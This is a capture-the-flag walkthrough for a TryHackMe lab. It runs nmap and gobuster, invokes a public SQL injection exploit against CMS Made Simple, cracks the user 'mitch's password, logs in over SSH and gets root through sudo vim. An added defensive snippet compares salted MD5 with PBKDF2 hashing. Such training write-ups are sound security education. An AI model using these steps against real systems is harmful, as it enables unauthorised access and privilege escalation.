TryHackMe - Easy CTF
IP Address: 10.10.17.246
Port Scanning
Scan the given IP for running services; -O detects the operating system, -sV determines the versions of the services that are running.
sudo nmap -sV -O 10.10.17.246
Open Ports:
| Port | Service | Version |
|---|---|---|
| 21/tcp | FTP | vsftpd 3.0.3 |
| 80/tcp | HTTP | Apache httpd 2.4.18 ((Ubuntu)) |
| 2222/tcp | SSH | OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 |
NSE - Nmap Scripting Engine
NSE ships premade scripts that automate a wide variety of networking tasks, e.g. nmap-vulners and vulscan.
nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p22 1##.##.###.#21
nmap -sV --script vulners --script-args mincvss=5.0 10.10.17.246
- vulners.mincvss: limit the CVEs shown to those with this CVSS score or greater. CVE stands for Common Vulnerabilities and Exposures.
- CVSS (Common Vulnerability Scoring System) is a free and open industry standard for assessing the severity of computer system security vulnerabilities.
vulscan tutorial: https://github.com/scipag/vulscan
Directory Enumeration
Finding all paths of a website using a wordlist. Here we use gobuster with a DirBuster wordlist.
gobuster dir -w /opt/node_modules/dirbuster/lists/directory-list-2.3-medium.txt -u http://10.10.248.51
| Flag | Description |
|---|---|
| -u | Specify the URL |
| -w | Path to the wordlist |
Result:
/simple
/server-status (inaccessible)
SQL Injection
Visiting /simple shows that CMS Made Simple version 2.2.8 is being hosted. A quick Google search for CVEs affecting it turns up a remote SQL injection vulnerability in versions prior to 2.2.10.
The details of the CVE can be found at: https://packetstormsecurity.com/files/152356/CMS-Made-Simple-SQL-Injection.html
There is code that runs the SQL injection, in which we have to pass in an IP address. Install the required libraries, then run the script, passing in the relevant data with flags.
python app.py -u http://10.10.248.51 --crack -w /opt/node_modules/dirbuster/lists/directory-list-2.3-medium.txt
After that you will receive the following details:
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
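The output above is a per-user salt plus a 32-character MD5 digest, and the exploit's --crack step tests candidate passwords against it. As an added example (not code from the writeup, the exploit, or CMS Made Simple), the snippet below reproduces the legacy check I assume that step performs, md5(salt + candidate), and places a hardened PBKDF2-HMAC-SHA256 scheme beside it; the iteration count and record format are my own assumptions.

```python
import hashlib
import hmac
import os

# Salt taken from the writeup's exploit output; the password below is the
# one it cracked. The stored digest is not reproduced here.
SAMPLE_SALT = "1dac0d92e9fa6bb2"
SAMPLE_PASSWORD = "secret"

# Assumed legacy scheme: one fast, unkeyed MD5 over salt + password. The salt
# stops precomputed tables but not a wordlist run straight from the database
# dump, which is exactly what the --crack step does.
def legacy_hash(salt: str, password: str) -> str:
    return hashlib.md5((salt + password).encode()).hexdigest()

def legacy_verify(salt: str, password: str, stored_hash: str) -> bool:
    return hmac.compare_digest(legacy_hash(salt, password), stored_hash)

# Hardened replacement (assumption: 600k iterations is current guidance for
# PBKDF2-HMAC-SHA256). Record format: algo$iterations$salt_hex$digest_hex.
PBKDF2_ITERATIONS = 600_000

def hardened_hash(password: str, salt: bytes = b"", iterations: int = PBKDF2_ITERATIONS) -> str:
    salt = salt or os.urandom(16)  # fresh random salt per record
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def hardened_verify(password: str, stored: str) -> bool:
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False  # malformed record, never accept
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    legacy = legacy_hash(SAMPLE_SALT, SAMPLE_PASSWORD)
    print("legacy md5(salt+pw):", legacy, legacy_verify(SAMPLE_SALT, SAMPLE_PASSWORD, legacy))
    record = hardened_hash(SAMPLE_PASSWORD)
    print("pbkdf2 record:", record, hardened_verify(SAMPLE_PASSWORD, record))
```

Each PBKDF2 verification costs hundreds of thousands of hash calls instead of one, so the same wordlist run becomes correspondingly slower against the hardened records.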
Getting Access
Now you can log in with these credentials over SSH, but SSH port 2222 must be specified (not the default port):
ssh mitch@10.10.248.51 -p 2222
We can now see the flag in the home directory: “G00d j0b, keep up!”
Privilege Escalation
Running sudo -l shows which commands the current user may run with root privileges; here we can see that mitch can run vim.
So we open vim with sudo and type :!sh, which spawns a shell from within vim; that shell runs as root.